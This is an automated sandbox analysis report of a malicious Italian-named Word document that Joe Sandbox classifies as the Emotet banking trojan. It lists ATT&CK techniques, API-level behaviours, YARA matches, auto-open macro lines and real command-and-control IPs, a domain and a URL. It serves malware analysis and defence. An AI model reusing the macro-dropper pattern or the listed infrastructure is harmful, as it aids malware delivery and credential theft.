Play interactive tour

Edit tour

Analysis Report Nuovo_documento_2019.09.20.doc

Overview

General Information

Joe Sandbox Version:	26.0.0 Aquamarine
Analysis ID:	961422
Start date:	20.09.2019
Start time:	13:28:47
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 9m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Nuovo_documento_2019.09.20.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.evad.winDOC@18/52@1/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 90.5% (good quality ratio 87.9%) Quality average: 82.2% Quality standard deviation: 25.6%
HCA Information:	Successful, ratio: 84% Number of executed functions: 133 Number of non-executed functions: 301
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy	Score	Range	Reporting	Whitelisted	Threat	Detection
Threshold	100	0 - 100	Report FP / FN	false	Emotet

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Valid Accounts1	Windows Management Instrumentation1	Valid Accounts1	Valid Accounts1	Software Packing2	Input Capture11	System Time Discovery1	Remote File Copy2	Input Capture11	Data Encrypted12	Uncommonly Used Port1
Replication Through Removable Media	PowerShell2	Modify Existing Service11	Access Token Manipulation1	Disabling Security Tools1	Network Sniffing	Security Software Discovery13	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Remote File Copy2
Drive-by Compromise	Scripting12	New Service12	Process Injection3	Deobfuscate/Decode Files or Information11	Input Capture	System Service Discovery1	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Standard Cryptographic Protocol22
Exploit Public-Facing Application	Execution through API1	System Firmware	New Service12	Scripting12	Credentials in Files	File and Directory Discovery11	Logon Scripts	Input Capture	Data Encrypted	Standard Non-Application Layer Protocol2
Spearphishing Link	Exploitation for Client Execution3	Shortcut Modification	File System Permissions Weakness	Obfuscated Files or Information2	Account Manipulation	System Information Discovery45	Shared Webroot	Data Staged	Scheduled Transfer	Standard Application Layer Protocol2
Spearphishing Attachment	Command-Line Interface11	Modify Existing Service	New Service	Masquerading2	Brute Force	Query Registry1	Third-party Software	Screen Capture	Data Transfer Size Limits	Commonly Used Port
Spearphishing via Service	Service Execution2	Path Interception	Scheduled Task	Valid Accounts1	Two-Factor Authentication Interception	Process Discovery2	Pass the Hash	Email Collection	Exfiltration Over Command and Control Channel	Uncommonly Used Port
Supply Chain Compromise	Third-party Software	Logon Scripts	Process Injection	Access Token Manipulation1	Bash History	Application Window Discovery1	Remote Desktop Protocol	Clipboard Data	Exfiltration Over Alternative Protocol	Standard Application Layer Protocol
Trusted Relationship	Rundll32	DLL Search Order Hijacking	Service Registry Permissions Weakness	Process Injection3	Input Prompt	Remote System Discovery1	Windows Admin Shares	Automated Collection	Exfiltration Over Physical Medium	Multilayer Encryption

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus or Machine Learning detection for sample

Show sources

Source: Nuovo_documento_2019.09.20.doc

Joe Sandbox ML: detected

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\982.exe

Virustotal: Detection: 15%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: Nuovo_documento_2019.09.20.doc

Virustotal: Detection: 22%

Perma Link

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\Users\user\982.exe	Code function: 7_2_0040207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,	7_2_0040207B
Source: C:\Users\user\982.exe	Code function: 7_2_00401F56 CryptGetHashParam,	7_2_00401F56
Source: C:\Users\user\982.exe	Code function: 7_2_0040215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,	7_2_0040215A
Source: C:\Users\user\982.exe	Code function: 7_2_00401F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,	7_2_00401F75
Source: C:\Users\user\982.exe	Code function: 7_2_00401F11 CryptExportKey,	7_2_00401F11
Source: C:\Users\user\982.exe	Code function: 7_2_00401FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	7_2_00401FFC
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_2_00401F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,	12_2_00401F75
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_2_00401FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	12_2_00401FFC
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_2_0040207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,	12_2_0040207B
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_2_00401F56 CryptGetHashParam,	12_2_00401F56
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_2_0040215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,	12_2_0040215A
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_2_00401F11 CryptExportKey,	12_2_00401F11
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_1_00401F75 CryptDecodeObjectEx,LocalFree,	12_1_00401F75

Spreading:

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: sabiosdelamor.co

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49163 -> 198.49.65.242:443

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49163 -> 198.49.65.242:443

Networking:

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49164 -> 149.167.86.174:990

IP address seen in connection with other malware

Show sources

Source: Joe Sandbox View

IP Address: 149.167.86.174 149.167.86.174

JA3 SSL client fingerprint seen in connection with other malware

Show sources

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Connects to IPs without corresponding DNS lookups

Show sources

Source: unknown	TCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknown	TCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknown	TCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknown	TCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknown	TCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknown	TCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknown	TCP traffic detected without corresponding DNS query: 181.164.8.25
Source: unknown	TCP traffic detected without corresponding DNS query: 181.164.8.25
Source: unknown	TCP traffic detected without corresponding DNS query: 181.164.8.25
Source: unknown	TCP traffic detected without corresponding DNS query: 181.164.8.25
Source: unknown	TCP traffic detected without corresponding DNS query: 181.164.8.25
Source: unknown	TCP traffic detected without corresponding DNS query: 181.164.8.25

Contains functionality to download additional files from the internet

Show sources

Source: C:\Windows\System32\sortedwatched.exe

Code function: 12_2_00401383 InternetReadFile,

12_2_00401383

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word

Jump to behavior

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: sabiosdelamor.co

Urls found in memory or binary data

Show sources

Source: sortedwatched.exe, 0000000C.00000002.559572605.00224000.00000004.00000020.sdmp	String found in binary or memory: http://181.164.8.25/attrib/schema/pdf/merge/
Source: sortedwatched.exe, 0000000C.00000002.559572605.00224000.00000004.00000020.sdmp	String found in binary or memory: http://181.164.8.25/attrib/schema/pdf/merge/n

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to retrieve information about pressed keystrokes

Show sources

Source: C:\Users\user\982.exe

Code function: 4_2_00403930 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

4_2_00403930

E-Banking Fraud:

Detected Emotet e-Banking trojan

Show sources

Source: C:\Users\user\982.exe	Code function: 7_2_0040F504		7_2_0040F504
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_2_0040F504		12_2_0040F504

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)

Show sources

Source: C:\Users\user\982.exe	Code function: 7_2_00401F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,		7_2_00401F75
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_2_00401F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,		12_2_00401F75

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Document image extraction number: 0

Screenshot OCR: Enable Editing and Enable Content. Type: Microsoft Word Document

Document contains an embedded VBA macro which may check the recent opened files (possible anti-VM)

Show sources

Source: Nuovo_documento_2019.09.20.doc

OLE, VBA macro line: If RecentFiles.Count > 3 Then

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\982.exe

Jump to dropped file

Contains functionality to call native functions

Show sources

Source: C:\Users\user\982.exe	Code function: 4_2_00522670 NtResumeThread,	4_2_00522670
Source: C:\Users\user\982.exe	Code function: 4_2_00522630 NtWriteVirtualMemory,	4_2_00522630
Source: C:\Users\user\982.exe	Code function: 4_2_005226D0 NtMapViewOfSection,	4_2_005226D0
Source: C:\Users\user\982.exe	Code function: 4_2_005226B0 NtCreateSection,	4_2_005226B0
Source: C:\Users\user\982.exe	Code function: 6_2_00492670 NtResumeThread,	6_2_00492670
Source: C:\Users\user\982.exe	Code function: 6_2_00492630 NtWriteVirtualMemory,	6_2_00492630
Source: C:\Users\user\982.exe	Code function: 6_2_004926D0 NtMapViewOfSection,	6_2_004926D0
Source: C:\Users\user\982.exe	Code function: 6_2_004926B0 NtCreateSection,	6_2_004926B0
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_005A2670 NtResumeThread,	9_2_005A2670
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_005A2630 NtWriteVirtualMemory,	9_2_005A2630
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_005A26D0 NtMapViewOfSection,	9_2_005A26D0
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_005A26B0 NtCreateSection,	9_2_005A26B0
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_005B2670 NtResumeThread,	11_2_005B2670
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_005B2630 NtWriteVirtualMemory,	11_2_005B2630
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_005B26D0 NtMapViewOfSection,	11_2_005B26D0
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_005B26B0 NtCreateSection,	11_2_005B26B0

Contains functionality to delete services

Show sources

Source: C:\Users\user\982.exe

Code function: 7_2_0040F6D0 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,

7_2_0040F6D0

Contains functionality to launch a process as a different user

Show sources

Source: C:\Users\user\982.exe

Code function: 7_2_00401D2B CreateProcessAsUserW,CreateProcessW,

7_2_00401D2B

Creates files inside the system directory

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe

File created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat

Jump to behavior

Creates mutexes

Show sources

Source: C:\Windows\System32\sortedwatched.exe	Mutant created: \BaseNamedObjects\Global\I3C4E0000
Source: C:\Users\user\982.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\I3C4E0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\982.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\M3C4E0000
Source: C:\Windows\System32\sortedwatched.exe	Mutant created: \BaseNamedObjects\Global\M3C4E0000

Detected potential crypto function

Show sources

Source: C:\Users\user\982.exe	Code function: 4_2_0042A127	4_2_0042A127
Source: C:\Users\user\982.exe	Code function: 4_2_0041032F	4_2_0041032F
Source: C:\Users\user\982.exe	Code function: 4_2_00429472	4_2_00429472
Source: C:\Users\user\982.exe	Code function: 4_2_0042A547	4_2_0042A547
Source: C:\Users\user\982.exe	Code function: 4_2_00435531	4_2_00435531
Source: C:\Users\user\982.exe	Code function: 4_2_004376A1	4_2_004376A1
Source: C:\Users\user\982.exe	Code function: 4_2_004366B1	4_2_004366B1
Source: C:\Users\user\982.exe	Code function: 4_2_00429947	4_2_00429947
Source: C:\Users\user\982.exe	Code function: 4_2_00435A75	4_2_00435A75
Source: C:\Users\user\982.exe	Code function: 4_2_00412AE3	4_2_00412AE3
Source: C:\Users\user\982.exe	Code function: 4_2_00429D1B	4_2_00429D1B
Source: C:\Users\user\982.exe	Code function: 4_2_0042EFFF	4_2_0042EFFF
Source: C:\Users\user\982.exe	Code function: 4_2_00435FB9	4_2_00435FB9
Source: C:\Users\user\982.exe	Code function: 4_2_002C50E8	4_2_002C50E8
Source: C:\Users\user\982.exe	Code function: 4_2_002C50E4	4_2_002C50E4
Source: C:\Users\user\982.exe	Code function: 4_2_002C22AF	4_2_002C22AF
Source: C:\Users\user\982.exe	Code function: 4_2_002C48C1	4_2_002C48C1
Source: C:\Users\user\982.exe	Code function: 4_2_00522970	4_2_00522970
Source: C:\Users\user\982.exe	Code function: 5_2_00404AD4	5_2_00404AD4
Source: C:\Users\user\982.exe	Code function: 5_2_0040436D	5_2_0040436D
Source: C:\Users\user\982.exe	Code function: 5_2_00402F82	5_2_00402F82
Source: C:\Users\user\982.exe	Code function: 5_2_004037A9	5_2_004037A9
Source: C:\Users\user\982.exe	Code function: 6_2_003E22AF	6_2_003E22AF
Source: C:\Users\user\982.exe	Code function: 6_2_003E50E8	6_2_003E50E8
Source: C:\Users\user\982.exe	Code function: 6_2_003E50E4	6_2_003E50E4
Source: C:\Users\user\982.exe	Code function: 6_2_003E48C1	6_2_003E48C1
Source: C:\Users\user\982.exe	Code function: 6_2_00492970	6_2_00492970
Source: C:\Users\user\982.exe	Code function: 7_2_00404AD4	7_2_00404AD4
Source: C:\Users\user\982.exe	Code function: 7_2_0040436D	7_2_0040436D
Source: C:\Users\user\982.exe	Code function: 7_2_00402F82	7_2_00402F82
Source: C:\Users\user\982.exe	Code function: 7_2_004037A9	7_2_004037A9
Source: C:\Users\user\982.exe	Code function: 7_1_00404AD4	7_1_00404AD4
Source: C:\Users\user\982.exe	Code function: 7_1_0040436D	7_1_0040436D
Source: C:\Users\user\982.exe	Code function: 7_1_00402F82	7_1_00402F82
Source: C:\Users\user\982.exe	Code function: 7_1_004037A9	7_1_004037A9
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_003E22AF	9_2_003E22AF
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_003E50E8	9_2_003E50E8
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_003E50E4	9_2_003E50E4
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_003E48C1	9_2_003E48C1
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_005A2970	9_2_005A2970
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_004F48C1	11_2_004F48C1
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_004F50E8	11_2_004F50E8
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_004F50E4	11_2_004F50E4
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_004F22AF	11_2_004F22AF
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_005B2970	11_2_005B2970
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_2_00404AD4	12_2_00404AD4
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_2_0040436D	12_2_0040436D
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_2_00402F82	12_2_00402F82
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_2_004037A9	12_2_004037A9
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_1_00404AD4	12_1_00404AD4
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_1_0040436D	12_1_0040436D
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_1_00402F82	12_1_00402F82
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_1_004037A9	12_1_004037A9

Document contains an ObjectPool stream indicating possible embedded files or OLE objects

Show sources

Source: Nuovo_documento_2019.09.20.doc

OLE indicator, ObjectPool: true

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: Nuovo_documento_2019.09.20.doc	OLE, VBA macro line: Sub autoopen()
Source: VBA code instrumentation	OLE, VBA macro: Module JIodCjfv, Function autoopen			Name: autoopen

Document contains embedded VBA macros

Show sources

Source: Nuovo_documento_2019.09.20.doc

OLE indicator, VBA macros: true

Dropped file seen in connection with other malware

Show sources

Source: Joe Sandbox View

Dropped File: C:\Users\user\982.exe 8743FB2C992EE623779B119C5BB06F9A523E2F335B0E64B8E133C4867295CE3C

Found potential string decryption / allocating functions

Show sources

Source: C:\Users\user\982.exe	Code function: String function: 0042922B appears 129 times
Source: C:\Users\user\982.exe	Code function: String function: 00429338 appears 52 times

PE file contains strange resources

Show sources

Source: 982.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 982.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 982.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Reads the hosts file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\sortedwatched.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\sortedwatched.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Yara signature match

Show sources

Source: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.322151721.00400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.327425390.005B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000001.321515804.00400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.302707019.00493000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.323191242.005A3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.295966721.00400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.297316445.00523000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.982.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 7.1.982.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 12.1.sortedwatched.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.sortedwatched.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.sortedwatched.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.sortedwatched.exe.5a3000.2.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.sortedwatched.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.982.exe.523000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.982.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.982.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 7.1.982.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.982.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.982.exe.493000.2.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.sortedwatched.exe.5b3000.2.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.sortedwatched.exe.5b3000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 10.1.sortedwatched.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.982.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.982.exe.523000.2.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.982.exe.493000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.sortedwatched.exe.5a3000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 12.1.sortedwatched.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 10.1.sortedwatched.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.sortedwatched.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.982.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research

Classification label

Show sources

Source: classification engine

Classification label: mal100.bank.evad.winDOC@18/52@1/3

Contains functionality to create services

Show sources

Source: C:\Users\user\982.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,	7_2_0040F7A0
Source: C:\Users\user\982.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,	7_1_0040F7A0
Source: C:\Windows\System32\sortedwatched.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,	12_2_0040F7A0

Contains functionality to enum processes or threads

Show sources

Source: C:\Users\user\982.exe

Code function: 5_2_00401943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

5_2_00401943

Contains functionality to instantiate COM classes

Show sources

Source: C:\Users\user\982.exe

Code function: 4_2_0041286F __EH_prolog3_GS,_memset,GetVersionExW,_malloc,_memset,_DebugHeapAllocator,_wcschr,CoInitializeEx,CoCreateInstance,

4_2_0041286F

Contains functionality to load and extract PE file embedded resources

Show sources

Source: C:\Users\user\982.exe

Code function: 4_2_004190A2 LoadResource,LockResource,_malloc,GetSysColor,GetSysColor,GetSysColor,GetSysColor,GetDC,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,SelectObject,StretchDIBits,SelectObject,DeleteDC,ReleaseDC,FreeResource,

4_2_004190A2

Contains functionality to modify services (start/stop/modify)

Show sources

Source: C:\Users\user\982.exe

